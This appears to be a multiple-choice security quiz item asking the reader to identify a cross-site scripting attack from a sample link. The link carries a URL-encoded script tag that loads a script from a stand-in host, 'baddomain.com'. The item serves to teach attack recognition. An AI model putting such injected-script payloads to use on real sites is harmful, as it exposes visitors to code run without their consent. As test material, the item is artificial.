This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.
<a href=”http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js %22%3E%3C/script%3E”>See foobar</a>
What is this attack?
A.
Cross-site-scripting attack
B.
SQL Injection
C.
URL Traversal attack
D.
Buffer Overflow attack